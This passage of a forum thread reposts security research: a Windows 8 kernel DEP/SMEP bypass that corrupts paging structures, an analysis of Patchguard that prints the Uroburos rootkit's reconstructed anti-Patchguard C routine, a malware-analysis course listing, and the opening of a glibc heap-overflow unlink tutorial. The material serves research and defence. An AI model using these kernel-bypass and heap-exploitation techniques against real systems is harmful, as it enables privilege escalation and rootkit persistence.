the paging structures to modify the U/S flag and cause it to be interpreted as kernel memory. Using Isolated PXEs If we corrupt a random PXE, we are likely to be in a case where the target PXE is part of a series of PXEs that are contiguous in memory. In these cases, during exploitation it might mean that an attacker would corrupt adjacent PXEs, which has a high risk of causing a crash. Most of the time, the attacker can’t simply modify only 1 bit in memory, but has to corrupt several bytes (8 bytes in our POC), which will force the attacker to corrupt more than just the relevant flags for the exploit. The easiest way to circumvent this issue is simply to target a PXE which is isolated (e.g., with unused PXE structures on either side of the target PXE). In 64-bit environments, a process has access to a huge virtual address space of 256TB as we are effectively using a 48-bit canonical addresses instead of the full 64-bit address space. A 48-bit virtual address is composed of several fields allowing it to reference different paging structures. As the PML4 field is 9 bits, it refers to one of 512 (2**9) PML4 entries. Each PML4 entry describes a range of 512GB (2**39). Obviously, a user process will not use so much memory that it will use all of the PML4 entries. Therefore, we can request the allocation of memory at an address outside of any 512GB used range. This will force the use of a new PML4 entry, which will reference structures containing only a single PDPT entry, a single PDE and a single PTE. An interested reader can verify this idea using the “!address” and “!pte” windbg extensions to observe those “holes” in memory. In the presented POC, the 0×100804020001 address is used, as it is very likely to be in an unused area. Practical Attack The code for the mitigation bypass is very simple. Suppose that we’ve got a vulnerable kernel component for which we are able to exploit a vulnerability which gives us a write-what-where primitive from a user-land process (this is implemented within the “write_what_where” function in our POC). We choose a virtual address with isolated paging structures (such as 0×100804020001), allocate it and fill it with our shellcode. We then retrieve all of its paging structures using the mapping function described earlier in this post (using the field shifting and the self- referencing PML4). Finally, we perform unaligned overwrites of the 4 PXEs relating to our chosen virtual address to modify its U/S bit to supervisor. Of course, other slightly different scenarios for exploitation could be considered. For instance, if we can decrement or increment an arbitrary value in memory, we could just flip the desired flags. Also, since we are using isolated paging structures, even in the case of a bug leading to the corruption of a lot of adjacent data, the technique can still be used because it is unlikely that any important structures are located in the adjacent memory. With this blog post, we provide an exploit for a custom driver with a very simple write-what-where vulnerability so as to let the reader experiment with the technique. However, this document was originally submitted to Microsoft with a real-world use-after-free vulnerability. Indeed, in a lot of cases, it would be possible for an attacker to force a write-what-where primitive from a vulnerability such as a use-after-free or a pool overflow. Mitigating the Attack This technique is not affected by KASLR because it is possible to directly derive the addresses of paging structures from a given virtual address. If randomization was introduced into this mapping, this would no longer be possible, and this technique would be mitigated as a result. Randomizing this function would require having a different self-referencing PML4 entry each time the kernel boots. However, it is recognised that many of the core functions of the kernel memory management may rely on this mapping to locate and update paging structures. It might also be possible to move the paging structures into a separate segment, and reference these structures using an offset in that segment. If we consider the typical write-what-where scenarios, unless the address specified already had a segment prefix, it would not be possible for an attacker to overwrite the paging structures, even if the offset within the segment was known. If this is not possible, another approach might be to use a hardware debug register as a faux locking mechanism. For example, if a hardware breakpoint was set on the access to the paging structures (or key fields of the structures), a handler for that breakpoint could test the value of the debug register to assess whether this access is legitimate or not. For example, before a legitimate modification to the paging structures, the kernel can unset the debug register, and no exception would be thrown. If an attacker attempted to modify the memory without unsetting the debug register, an exception could be thrown to detect this. Vendor Response We reported this issue to Microsoft as part of their Mitigation Bypass Bounty Program. However, they indicated that this did not meet all of their program guidelines as it cannot be used to remotely exploit user-mode vulnerabilities. In addition, Microsoft stated that their security engineering team were aware of this “limitation”, they did not consider this a security vulnerability, and that the development of a fix was not currently planned. With this in mind, we have decided to release this post and the accompanying code to provide a public example of current Windows kernel research. However, we have chosen not to release the fully weaponised exploit we developed as part of the submission to Microsoft, as this makes use of a vulnerability that has only recently been patched. Conclusion The technique proposed in this post allows an attacker to reliably bypass both DEP and SMEP in a generic way. We showed that it is possible to derive the addresses of paging structures from a virtual address, and how an attacker could use this to corrupt paging structures so as to create executable kernel memory, even in low memory addresses. We demonstrated that this technique is usable without the fear of corrupting non targeted PXEs, even if the attacker had to corrupt large quantities of memory. Furthermore, we showed that this technique is not specific to bugs that provide a write-what-where primitive, but can also be used for a broad range of bug classes. Sursa: https://labs.mwrinfosecurity.com/blog/2014/08/15/windows-8-kernel-memory-protections-bypass/
  9. The Windows 8.1 Kernel Patch Protection In the last 3 months we have seen a lot of machines compromised by Uroburos (a kernel-mode rootkit that spreads in the wild and specifically targets Windows 7 64-bit). Curiosity lead me to start analyzing the code for Kernel Patch Protection on Windows 8.1. We will take a glance at its current implementation on that operating system and find out why the Kernel Patch Protection modifications made by Uroburos on Windows 7 don’t work on the Windows 8.1 kernel. In this blog post, we will refer to the technology known as “Kernel Patch Protection” as “Patchguard”. Specifically, we will call the Kernel Patch Protection on Windows 7 “Patchguard v7”, and the more recent Windows 8.1 version “Patchguard v8”. The implementation of Patchguard has slightly changed between versions of Windows. I would like to point out the following articles that explain the internal architecture of older versions of Patchguard: Skape, Bypassing PatchGuard on Windows x64, Uninformed, December 2005 Skywing, PatchGuard Reloaded - A Brief Analysis of PatchGuard Version 3, Uninformed, September 2007 Christoph Husse, Bypassing PatchGuard 3 - CodeProject, August 2008 Kernel Patch Protection - Old version attack methods We have seen some attacks targeting older versions of the Kernel Patch Protection technology. Some of those (see Fyyre’s website for examples) disarm Patchguard by preventing its initialization code from being called. Patchguard is indeed initialized at Windows startup time, when the user switches on the workstation. To do this, various technologies have been used: the MBR Bootkit (PDF, in Italian), VBR Bootkit, and even a brand-new UEFI Bootkit. These kind of attacks are quite easy to implement, but they have a big drawback: they all require the victim's machine to be rebooted, and they are impossible to exploit if the target system implements some kind of boot manager digital signature protection (like Secure Boot). Other techniques relied on different tricks to evade Patchguard or to totally block it. These techniques involve: x64 debug registers (DR registers) - Place a managed hardware breakpoint on every read-access in the modified code region. This way the attacker can restore the modification and then continue execution Exception handler hooking - PatchGuard’s validation routine (the procedure that calls and raises the Kernel Patch protection checks) is executed through exception handlers that are raised by certain Deferred Procedure Call (DPC) routines; this feature gives attackers an easy way to disable PatchGuard. Hooking KeBugCheckEx and/or other kernel key functions - System compromises are reported through the KeBugCheckEx routine (BugCheck code 0x109); this is an exported function. PatchGuard clears the stack so there is no return point once one enters KeBugCheckEx, though there is a catch. One can easily resume the thread using the standard “thread startup” function of the kernel. Patching the kernel timer DPC dispatcher - Another attack cited by Skywing (see references above). By design, PatchGuard’s validation routine relies on the dispatcher of the kernel timers to kick in and dispatch the deferred procedure call (DPC) associated with the timer. Thus, an obvious target for attackers is to patch the kernel timer’s DPC dispatcher code to call their own code. This attack method is easy to implement. Patchguard code direct modification - Attack method described in a paper by McAfee. They located the encrypted Patchguard code directly in the kernel heap, then manually decrypted it and modified its entry point (the decryption code). The Patchguard code was finally manually re-encrypted. The techniques described above are quite ingenious. They disable Patchguard without rebooting the system or modify boot code. It’s worth noting that the latest Patchguard implementation has rendered all these techniques obsolete, because it has been able to completely neutralize them. Now let’s analyse how the Uroburus rootkit implements the KeBugCheckEx hooks to turn off Kernel Patch Protection on a Windows 7 SP1 64-bit system. Uroburus rootkit - KeBugCheckEx’ hook Analysing an infected machine reveals that the Uroburos 64-bit driver doesn’t install any direct hook on the kernel crash routine named “KeBugCheckEx”. So why doesn't it do any direct modification? To answer this question, an analysis of Patchguard v7 code is needed. Patchguard copies the code of some kernel functions into a private kernel buffer. The copied procedures are directly used by Patchguard to perform all integrity checks, including crashing the system if any modification is found.In the case of system modifications, it copies the functions back to their original location and crashes the system. The problem with the implementation of Patchguard v7 lies in the code for the procedures used by protected routines. That code is vulnerable to direct manipulation as there is only one copy (the original one) This is, in fact, the Uroburos strategy: KeBugCheckEx is not touched in any manner. Only a routine used directly by KeBugCheckEx is forged: RtlCaptureContext. The Uroburos rootkit installs deviations in the original Windows Kernel routines by registering custom software interrupt 0x3C. In the forged routines, the interrupt is raised using the x86 opcode “int” RtlCaptureContext The related Uroburos interrupt service routine of the RtlCaptureContext routine (sub-type 1), is raised by the forged code. The software interrupt is dispatched, the original routine called and finally the processor context is analysed. A filter routine is called. It implements the following code: /* Patchguard Uroburos Filter routine* dwBugCheckCode - Bugcheck code saved on the stack by KeBugCheckEx routine * lpOrgRetAddr - Original RtlCaptureContext call return address */ void PatchguardFilterRoutine(DWORD dwBugCheckCode, ULONG_PTR lpOrgRetAddr) { LPBYTE pCurThread = NULL; // Current running thread LPVOID lpOrgThrStartAddr = NULL; // Original thread DWORD dwProcNumber = 0; // Current processor number ULONG mjVer = 0, minVer = 0; // OS Major and minor version indexes QWORD * qwInitialStackPtr = 0; // Thread initial stack pointer KIRQL kCurIrql = KeGetCurrentIrql(); // Current processor IRQL // Get Os Version PsGetVersion(&mjVer, &minVer, NULL, NULL); if (lpOrgRetAddr > (ULONG_PTR)KeBugCheckEx && lpOrgRetAddr < ((ULONG_PTR)KeBugCheckEx + 0x64) && dwBugCheckCode == CRITICAL_STRUCTURE_CORRUPTION) { // This is the KeBugCheckEx Patchguard invocation // Get Initial stack pointer qwInitialStackPtr = (LPQWORD)IoGetInitialStack(); if (g_lpDbgPrintAddr) { // DbgPrint is forged with a single "RETN" opcode, restore it // DisableCR0WriteProtection(); // ... restore original code ... // RestoreCR0WriteProtection(); // Revert CR0 memory protection } pCurThread = (LPBYTE)KeGetCurrentThread(); // Get original thread start address from ETHREAD lpOrgThrStartAddr = *((LPVOID*)(pCurThread + g_dwThrStartAddrOffset)); dwProcNumber = KeGetCurrentProcessorNumber(); // Initialize and queue Anti Patchguard Dpc KeInitializeDpc(&g_antiPgDpc, UroburusDpcRoutine, NULL); KeSetTargetProcessorDpc(&g_antiPgDpc, (CCHAR)dwProcNumber); KeInsertQueueDpc(&g_antiPgDpc, NULL, NULL); // If target Os is Windows 7 if (mjVer >= 6 && minVer >= 1) // Put stack base address in first stack element qwInitialStackPtr[0] = ((ULONG_PTR)qwInitialStackPtr + 0x1000) & (~0xFFF); if (kCurIrql > PASSIVE_LEVEL) { // Restore original DPC context ("KiRetireDpcList" Uroburos interrupt plays // a key role here). This call doesn't return RestoreDpcContext(); // The faked DPC will be processed } else { // Jump directly to original thread start address (ExpWorkerThread) JumpToThreadStartAddress((LPVOID)qwInitialStackPtr, lpOrgThrStartAddr, NULL); } } } As the reader can see, the code is quite straightforward. First it analyses the original context: if the return address lives in the prologue of the kernel routine KeBugCheckEx and the bugcheck code equals to CRITICAL_STRUCTURE_CORRUPTION , then it means that Uroburos has intercepted a Patchguard crash request. The initial thread start address and stack pointer is obtained from the ETHREAD structure and a faked DPC is queued: // NULL Uroburos Anti-Patchguard DPCvoid UroburusDpcRoutine(struct _KDPC *Dpc, PVOID DeferredContext, PVOID SystemArgument1, PVOID SystemArgument2) { return; } Code execution is resumed in one of two different places based on the current Interrupt Request Level (IRQL). If IRQL is at the PASSIVE_LEVEL then a standard JMP opcode is used to return to the original start address of the thread from which the Patchguard check originated (in this case, it is a worker thread created by the “ExpWorkerThread” routine). If the IRQL is at a DISPATCH_LEVEL or above, Uroborus will exploit the previously acquired processor context using the KiRetireDpcList hook. Uroburos will then restart code execution at the place where the original call to KiRetireDpcList was made, remaining at the high IRQL level. The faked DPC is needed to prevent a crash of the restored thread. KiRetireDpcList and RtlLookupFunctionEntry As shown above, the KiRetireDpcList hook is needed to restore the thread context in case of a high IRQL. This hook saves the processor context before the original call is made and then transfers execution back to the original KiRetireDpcList Windows code. Publicly available literature about Uroburos claims that the RtlLookupFunctionEntry hook is related to the Anti-Patchguard feature. This is wrong. Our analysis has pinpointed that this hook is there only to hide and protect the Uroburos driver’s RUNTIME_FUNCTIONarray (see my previous article about Windows 8.1 Structured Exception Handling). Conclusion The Uroburos anti-Patchguard feature code is quite simple but very effective. This method is practically able to disarm all older versions of the Windows Kernel Patch protection without any issues or system crashes. Patchguard v8 - Internal architecture STARTUP The Windows Nt Kernel startup is accomplished in 2 phases. The Windows Internals book describes the nitty-gritty details of both phases. Phase 0 builds the rudimentary kernel data structures required to allow the services needed in phase 1 to be invoked (page tables, per-processor Processor Control Blocks (PRCBs), internal lists, resources and so on…). At the end of phase 0, the internal routine InitBootProcessor uses a large call stack that ends right at the Phase1InitializationDiscard function. This function, as the name implies, discards the code that is part of the INIT section of the kernel image in order to preserve memory. Inside it, there is a call to the KeInitAmd64SpecificState routine. Analysing it reveals that the code is not related to its name: int KeInitAmd64SpecificState() { DWORD dbgMask = 0; int dividend = 0, result = 0; int value = 0; // Exit in case the system is booted in safe mode if (InitSafeBootMode) return 0; // KdDebuggerNotPresent: 1 - no debugger; 0 - a debugger is attached dbgMask = KdDebuggerNotPresent; // KdPitchDebugger: 1 - debugger disabled; 0 - a debugger could be attached dbgMask |= KdPitchDebugger; if (dbgMask) dividend = -1; // Debugger completely disabled else dividend = 0x11; // Debugger might be enabled value = (int)_rotr(dbgMask, 1); // “value” is equal to 0 if debugger is enable // 0x80000000 if debugger is NOT enabled // Perform a signed division between two 32 bit integers: result = (int)(value / dividend); // IDIV value, dividend return result; } The routine’s code ends with a signed division: if a debugger is present the division is evaluated to 0 (0 divided by 0x11 is 0), otherwise a strange thing happens: 0x80000000 divided by 0xFFFFFFFF raises an overflow exception. To understand why, let’s simplify everything and perform as an example an 8-bit signed division such as: -128 divided by -1. The result should be +128. Here is the assembly code: mov cl, FFh mov ax, FF80h idiv cl The last instruction clearly raises an exception because the value +128 doesn’t fit in the destination 8-bit register AL (remember that we are speaking about signed integers). Following the SEH structures inside of the Nt Kernel file leads the code execution to the “KiFilterFiberContext” routine. This is another procedure with a misleading name: all it does is disable a potential debugger, and prepare the context for the Patchguard Initialization routine. The initialization routine of the Kernel Patch Protection technology is a huge function (95 KB of pure machine code) inside the INIT section of Nt Kernel binary file. From now on, we will call it “KiInitializePatchguard”. INTERNAL ARCHITECTURE, A QUICK GLANCE The initialization routine builds all the internal Patchguard key data structures and copies all its routines many times. The code for KiInitializePatchguard is very hard to follow and understand because it contains obfuscation, useless opcode, and repeated chunks. Furthermore, it contains a lot checks for the presence of debugger. After some internal environment checks, it builds a huge buffer in the Kernel Nonpaged pool memory that contains all the data needed by Patchguard. This buffer is surrounded by a random numbers of 8 bytes QWORD seed values repetitively calculated with the “RDTSC” opcode. Image: https://lh4.googleusercontent.com/oym_O5vcYyOXAlauXqrwRVVEt2rkj27OED4AwT90LsveJ6KfUbfFqh_lx-ZJxEasIVx_aTU6Fqdreh5pNm55yK5vPcS7xPM0TZ5VpWrotqJUjRsBEE9ax06G-N5_oa3aBA As the reader can see from the above picture , the Patchguard buffer contains a lot of useful info. All data needed is organized in 3 main sections: Internal configuration data The first buffer area located after the TSC (time stamp counter) Seed values contains all the initial patchguard related configuration data. Noteworthy are the 2 Patchguard Keys (the master one, used for all key calculation, and the decryption key), the Patchguard IAT (pointers of some Nt kernel function) and all the needed Kernel data structures values (for example the KiWaitAlways symbol, KeServiceDescriptorTable data structure, and so on…), the Patchguard verification Work item, the 3 copied IDT entries (used to defeat the Debug registers attack), and finally, the various Patchguard internal relocated functions offsets. Patchguard and Nt Vital routines code This section is very important because it contains the copy of the pointers and the code of the most important Nt routines used by Patchguard to crash the system in case of something wrong is found. In this way even if a rootkit tries to forge or block the crash routines, Patchguard code can completely defeat the malicious patch and correctly crash the system. Here is the list of the copied Nt functions: HaliHaltSystem, KeBugCheckEx, KeBugCheck2, KiBugCheckDebugBreak, KiDebugTrapOrFault, DbgBreakPointWithStatus, RtlCaptureContext, KeQueryCurrentStackInformation, KiSaveProcessorControlState, HalHaltSystem pointer Furthermore the section contains the entire “INITKDBG” code section of Nt Kernel. This section implement the main Patchguard code: - Kernel Patch protection main check routine and first self-verification procedure - Patchguard Work Item routine, system crash routine (that erases even the stack) - Patchguard timer and one entry point (there are many others, but not in INITKDBG section) Protected Code and Data All the values and data structures used to verify the entire Nt kernel code resides here. The area is huge (227 KB more or less) and it is organized in at least 3 different way: [*=1] First 2 KB contains an array of data structures that stores the code (and data) chunks pointer, size, and relative calculated integrity keys of all the Nt functions used by Kernel Patch Protection to correctly do its job. [*=1] Nt Kernel Module (“ntoskrnl.exe”) base address and its Exception directory pointer, size and calculated integrity key. A big array of DWORD keys then follows. For each module’s exception directory RUNTIME_FUNCTION entry there is a relative 4 bytes key. In this manner Patchguard can verify each code chunk of the Nt Kernel. [*=1] A copy of all Patchguard protected data. I still need to investigate the way in which the protected Patchguard data (like the global “CI.DLL” code integrity module’s “g_CiOptions” symbol for example) is stored in memory, but we know for sure that the data is binary copied from its original location when the OS is starting in this section VERIFICATION METHODS - Some Words Describing the actual methods used to verify the integrity of the running Operating system kernel is outside the scope of this article. We are going only to get an introduction... Kernel Patch protection has some entry points scattered inside the Kernel: 12 DPC routines, 2 timers, some APC routines, and others. When the Patchguard code acquires the processor execution, it decrypts its buffer and then calls the self-verify routine. The latter function first verifies 0x3C0 bytes of the Patchguard buffer (including the just-executed decryption code), re-calculating a checksum value and comparing it with the stored one. Then it does the same verification as before, but for the Nt Functions exploited by its main check routine. The integrity keys and verification data structures are stored in the start of area 3 of PG buffer. If one of the checks goes wrong, Patchguard self-verify routine immediately crashes the system. It does this in a very clever manner: First it restores all the Virtual memory structures values of vital Nt kernel functions (like Page table entry, Page directory entry and so on…). Then it replaces all the code with the copied one, located in the Patchguard buffer. In this way each eventual rootkit modification is erased and as result Patchguard code can crash the system without any obstacles. Finally calls “SdbpCheckDll” routine (misleading name) to erase the current thread stack and transfer execution to KeBugCheckEx crash routine. Otherwise, in the case that all the initial checks pass, the code queues a kernel Work item, exploiting the standard ExQueueWorkItem Kernel API (keep in mind that this function has been already checked by the previous self-verify routine). The Patchguard work item code immediately calls the main verification routine. It then copies its own buffer in another place, re-encrypt the old Patchguard buffer, and finally jumps to the ExFreePool Kernel function. The latter procedure will delete the old Patchguard buffer. This way, every time a system check is raised, the Patchguard buffer location changes. Main check routine uses some other methods to verify each Nt Kernel code and data chunk. Describing all of them and the functionality of the main check routine is demanded to the next blog post…. The code used by Patchguard initialization routine to calculated the virtual memory data structure values is something curious. Here is an example used to find the Page Table entry of a 64-bit memory address: CalculatePteVa: shr rcx, 9 ; Original Ptr address >> 9 mov rax, 98000000000h ; This negated value is FFFFFF680'00000000, or more ; precisely "16 bit set to 1, X64 auto-value, all zeros" mov r15, 07FFFFFFFF8h and rcx, r15 ; RCX & 7F'FFFFFFF8h (toggle 25 MSB and last 3 LSB) sub rcx, rax ; RCX += FFFFFF680'00000000 mov rax, rcx ; RAX = VA of PTE of target function For the explanation on how it really works, and what is the x64 0x1ED auto-value, I remind the reader to the following great book about X64 Memory management: Enrico Martignetti - What Makes it Page? The Windows 7 (x64) Virtual Memory Manager (2012) Conclusions In this blog post we have analysed the Uroburos code that disables the old Windows 7 Kernel Patch Protection, and have given overview of the new Patchguard version 8 implementation. The reader should now be able to understand why the attacks such as the one used by Uroburos could not work with the new version of Kernel Patch Protection. It seems that the new implementation of this technology can defeat all known attacks. Microsoft engineers have done a great amount of work to try to mitigate a class of attacks . Because of the fact that the Kernel Patch Protection is not hardware-assisted, and the fact that its code runs at kernel-mode privilege level (the same of all kernel drivers), it is not perfect. At an upcoming conference, I will demonstrate that a clever researcher can still disarm this new version, even if it’s a task that is more difficult to accomplish. The researcher can furthermore use the original Microsoft Patchguard code even to protect his own hooks…. Stay tuned! Sursa: VRT: The Windows 8.1 Kernel Patch Protection
  10. Creator: Veronica Kovah License: Creative Commons: Attribution, Share-Alike (http://creativecommons.org/licenses/by-sa/3.0/) Class Prerequisites: None Lab Requirements: Linux system with VirtualBox and Windows XP VM. Class Textbooks: “Practical Malware Analysis” by Michael Sikorski and Andrew Honig Recommended Class Duration: 2-3 days Creator Available to Teach In-Person Classes: Yes Author Comments: This introductory malware dynamic analysis class is dedicated to people who are starting to work on malware analysis or who want to know what kinds of artifacts left by malware can be detected via various tools. The class will be a hands-on class where students can use various tools to look for how malware is: Persisting, Communicating, and Hiding We will achieve the items above by first learning the individual techniques sandboxes utilize. We will show how to capture and record registry, file, network, mutex, API, installation, hooking and other activity undertaken by the malware. We will create fake network responses to deceive malware so that it shows more behavior. We will also talk about how using MITRE's Malware Attribute Enumeration & Characterization (MAEC - pronounced "Mike") standard can help normalize the data obtained manually or from sandboxes, and improve junior malware analysts' reports. The class will additionally discuss how to take malware attributes and turn them into useful detection signatures such as Snort network IDS rules, or YARA signatures. Dynamic analysis should always be an analyst's first approach to discovering malware functionality. But this class will show the instances where dynamic analysis cannot achieve complete analysis, due to malware tricks for instance. So in this class you will learn when you will need to use static analysis, as offered in follow the follow on Introduction to Reverse Engineering and Reverse Engineering Malware classes. During the course students will complete many hands on exercises. Course Objectives: * Understand how to set up a protected dynamic malware analysis environment * Get hands on experience with various malware behavior monitoring tools * Learn the set of malware artifacts an analyst should gather from an analysis * Learn how to trick malware into exhibiting behaviors that only occur under special conditions * Create actionable detection signatures from malware indicators This class is recommended for a later class on malware static analysis. This is so that students understand both techniques, and utilize the technique which gives the quickest answer to a given question. Every attempt was made to properly cite references, but if any are missing, please contact the author. Class Materials All Materials (.zip of odp(222 slides) & class malware examples) All Materials (.zip of pdf(222 slides) & class malware examples) Slides Part 1 (Background concepts, terms, tools & lab setup, 68 slides) Slides Part 2 (RAT Analysis (Poison Ivy), persistence & maneuvering (how the malware strategically positions itself on the system, 67 slides) Slides Part 3 (Malware functionality (e.g. keylogging, phone home, security degradation, self-destruction, etc), 43 slides) Slides Part 3 (Using an all-in-one sandbox (Cuckoo), MAEC, converting output to actionable indicators of malware presence (e.g. Snort/Yara signatures), 44 slides) malware samples used in class. Password is “infected” HD Videos on Youtube Full quality downloadable QuickTime, h.264, and Ogg videos at Archive.org: Day 1 Part 1 : Introduction (8:10) Day 1 Part 2 : Background: VirtualBox (5:56) Day 1 Part 3 : Background: PE files & Packers (17:00) Day 1 Part 4 : Background: File Identification (15:44) Day 1 Part 5 : Background: Windows Libraries (4:27) Day 1 Part 6 : Background: Windows Processes (35:16) Day 1 Part 7 : Background: Windows Registry (18:07) Day 1 Part 8 : Background: Windows Services (25:52) Day 1 Part 9 : Background: Networking Refresher (27:38) Day 1 Part 10 : Isolated Malware Lab Setup (26:47) Day 1 Part 11 : Malware Terminology (6:50) Day 1 Part 12 : Playing with Malware: Poison Ivy RAT (30:54) Day 1 Part 13 : Behavioral Analysis Overview (5:30) Day 1 Part 14 : Persistence (34:54) Day 2 will be posted Aug 24th Day 3 was lost due to a video server malfunction. The class will be re-delivered at MITRE in September, and day 3 be re-recorded then. Sursa: MalwareDynamicAnalysis
  11. x86 Exploitation 101: heap overflows… unlink me, would you please? Well, do the previous techniques apply to the dynamic allocation scenario? What if, instead of a statically allocated array, there’s a malloc-ed space? Would that work? Well, more or less, but things get REALLY more complicated. And I mean it for real. So, instead of stack overflows, there will be heap overflows: problem is that heap and stack work in different ways. In addition, the heap is handled differently according to the allocator implementation: this makes heap overflow exploits really dependent on the allocator implementation and on the operating system. As for now I’m taking care about Linux, I decided to analyze the exploitation scenario and the history of the most common Linux allocator, i.e. the one included in GNU C library (glibc). Why should I care about the history? Glibc developers patched, time after time, the most of the bugs in the malloc implementation that allowed exploits to work. This, anyway, is a good training exercise to really get into this stuff and understand the general thought. Also, as the exploitation of a heap overflow strongly relies on the implementation of the allocator, a deep analysis on how it’s implemented is mandatory. So, first things first. How is the malloc implemented in glibc? The implementation is a variation of the ptmalloc2 implementation, which is a variation of dlmalloc. Anyway, as the glibc code says, “There have been substantial changes made after the integration into glibc in all parts of the code. Do not look for much commonality with the ptmalloc2 version”. Even if it’s a variation of a variation, the fundamental ideas are still the same. Actually the ptmalloc2 supports more than one heap at the same time, and each heap is identified by the following structure: [INDENT] typedef struct _heap_info { mstate ar_ptr; /* Arena for this heap. */ struct _heap_info *prev; /* Previous heap. */ size_t size; /* Current size in bytes. */ size_t mprotect_size; /* Size in bytes that has been mprotected PROT_READ|PROT_WRITE. */ /* Make sure the following data is properly aligned, particularly that sizeof (heap_info) + 2 * SIZE_SZ is a multiple of MALLOC_ALIGNMENT. */ char pad[-6 * SIZE_SZ & MALLOC_ALIGN_MASK]; } heap_info; [/INDENT] The most important thing in this structure is the ar_ptr variable, as it’s a pointer to the arena, i.e. the heap itself. Also, there’s the size variable storing the size of the heap. Having more than one heap in a multi-threading context is really useful, as if a thread is reading the content of a variable in a given arena and another thread asks to allocate new memory, it is possible to create a new arena and use the newly created one to perform all the required operations. Each arena is described by the following structure: [INDENT] struct malloc_state { /* Serialize access. */ mutex_t mutex; /* Flags (formerly in max_fast). */ int flags; /* Fastbins */ mfastbinptr fastbinsY[NFASTBINS]; /* Base of the topmost chunk -- not otherwise kept in a bin */ mchunkptr top; /* The remainder from the most recent split of a small request */ mchunkptr last_remainder; /* Normal bins packed as described above */ mchunkptr bins[NBINS * 2 - 2]; /* Bitmap of bins */ unsigned int binmap[BINMAPSIZE]; /* Linked list */ struct malloc_state *next; /* Linked list for free arenas. */ struct malloc_state *next_free; /* Memory allocated from the system in this arena. */ INTERNAL_SIZE_T system_mem; INTERNAL_SIZE_T max_system_mem; }; [/INDENT] In this structure, there’s the mutex for this arena, used during concurrent accesses, and two other really important fields: top and bins. The top field is a chunk of memory (the fundamental element of the allocator) and it’s where the data for which the space has been allocated are going to be stored. Each chunk in this is a memory fragment that can be allocated. At the beginning, there’s only one big chunk in the arena (called wilderness), which is pointed by the top field itself: this chunk is always free and its size represents the free space of the arena. Also it marks the end of the available space of the arena. The bins array is composed by double-linked lists to chunks that were allocated and that were successively freed (this means that, at the beginning, all the bins are empty). Each bin stores a list of chunks of specified size in order to allow the allocator to easily search for a free chunk, given the size: the research will be performed by starting looking for the smallest and best-fitting one. The chunk is described by the following structure: [INDENT] struct malloc_chunk { INTERNAL_SIZE_T prev_size; /* Size of previous chunk (if free). */ INTERNAL_SIZE_T size; /* Size in bytes, including overhead. */ struct malloc_chunk* fd; /* double links -- used only if free. */ struct malloc_chunk* bk; /* Only used for large blocks: pointer to next larger size. */ struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */ struct malloc_chunk* bk_nextsize; }; [/INDENT] The different fields of this structure are used in different ways, depending on the status of the chunk itself. If the chunk is allocated, only the first two fields are present. The prev_size fields specifies the size of the previous chunk if the previous one is free (if it is allocated, then this field is “shared” with the previous chunk, enlarging it of 4 bytes, in order to decrease the waste of space), while the size field specifies the size of the current chunk. Then, if the chunk is in free state, there are in addition two pointers: fd and bk. These are the pointers used to double link the list of chunks. The other two pointers (present anyway only in free chunks) are not that important in this context and won’t be examined. How come there’s no flag to tell if the current chunk is free or allocated? Well, a feature of the chunks in this implementation is that they are 8-bytes aligned: this means that the last three bits of the size field can be used as general purpose flags. The LSB of the size variable tells us if the previous chunk is allocated or not (PREV_INUSE) The following bit tells if the chunk was allocated by using the mmap system call (IS_MMAPPED) The third bit specifies if the chunk is stored in the main arena or not (NON_MAIN_ARENA) In order to know if a given chunk is free or not it is necessary to get the next chunk by adding size to the pointer of the current chunk (obtaining the address of the next chunk), and checking the LSB of the size field of the next chunk. When the malloc function is called, the first thing done is to search in the bins if there’s already a previously-freed chunk available matching the specified size, otherwise, a new chunk is created in the wilderness next to last allocated one. If a chunk is found in the bins, it is necessary to remove it from the list, in order to keep the whole structure coherent. This is done by using the infamous unlink macro defined in malloc.c: this macro uses the bk and the fd fields of the chunk to be moved to perform its task. Before glibc 2.3.4 (released at the end of the 2004), the unlink macro was defined as follows: [INDENT] /* Take a chunk off a bin list */ #define unlink(P, BK, FD) { \ FD = P->fd; \ BK = P->bk; \ FD->bk = BK; \ BK->fd = FD; \ } [/INDENT] This macro is just an extraction of an item from a double-linked list: business as usual. If no space is available on the heap, new memory for the heap is requested to the operating system, by using the sbrk or the mmap system call (if mmap is used, then the chunk is marked with the IS_MMAPPED bit). The heap address where the chunk has been allocated is then returned to malloc. However there’s another situation in which the unlink macro may be used: during a free. In fact, if the chunk(s) next (both before and after) to the one that is going to be freed is/are not used, then all of them are merged together in one chunk. This means that all the chunks that were in free status before the merging need to be unlinked from the bins where they were by using the aforementioned macro. The resulting chunk is finally moved to the unsorted_chunks list On July 2000, Solar Designer on Openwall and then on November 2001 MaXX on Phrack #57, published two articles on how to exploit this macro. Their whole point is: what if it was possible to modify the fd and the bk pointers? In fact, if we look at the malloc_chunk structure, the whole unlink macro can be reduced to the following instructions: [INDENT] FD = *P + 8; BK = *P + 12; FD + 12 = BK; BK + 8 = FD; [/INDENT] This means that, if we could control the fd and the bk pointers, it would be possible to overwrite the FD+12 location with the BK content. If BK points to the shellcode address, that would be awesome. Actually the BK+8 location gets overwritten as well, and that would be in the middle of the shellcode itself: this means that the first instruction of the shellcode should jump over this overwritten part. Here the chance of overwriting any DWORD of memory is given: the problem is which one would be of any use to be overwritten? Overwriting the return address, just like in the stack overflows, is a painful, as it depends on the stack situation at the moment. Interesting alternatives would be about overwriting something in libc, an exception handler address, or the free function address itself. This means that every single function pointer can actually be overwritten. MaXX, in his article on Phrack, proposed the idea of overwriting the first function pointer emplacement in the .dtors section (he actually re-proposed the ideas already exposed in this article). gcc provides an interesting feature: constructors and destructors. The idea behind this is exactly the same used in C++ for classes. It is possible to specify attributes for some functions that will be automatically executed before the main function (constructors) or after (destructors). The declarations are specified in the following way: static void start(void) __attribute__ ((constructor)); static void stop(void) __attribute__ ((destructor)); where start and stop are arbitrary names for functions. The addresses of these functions will be stored, respectively, in the .ctors and in .dtors section in the following way: there are 4 bytes set to 0xFF at the beginning and 4 bytes set to 0x00 at the end and, in between, there are the addresses of the functions. Of course, if there are no constructors/destructors defined, the .ctors/.dtors section would look like 0xFFFFFFFF 0x00000000. The goal is to overwrite the 0x00000000 part with the address of the function that has to be executed as a constructor (the head MUST be left as 0xFFFFFFFF). So, the “only” thing left to do is to be able to control the fd and the bk pointers. How this can be done? To do this, two adjacent allocate chunks are required and an overflow must be possible on the first one. In fact, let’s say that we have the following piece of code: [INDENT] #include <stdlib.h> #include <string.h> int main(int argc, char **argv) { char *first_buf; char *second_buf; first_buf = (char *)malloc(78 * sizeof(char)); second_buf = (char *)malloc(20 * 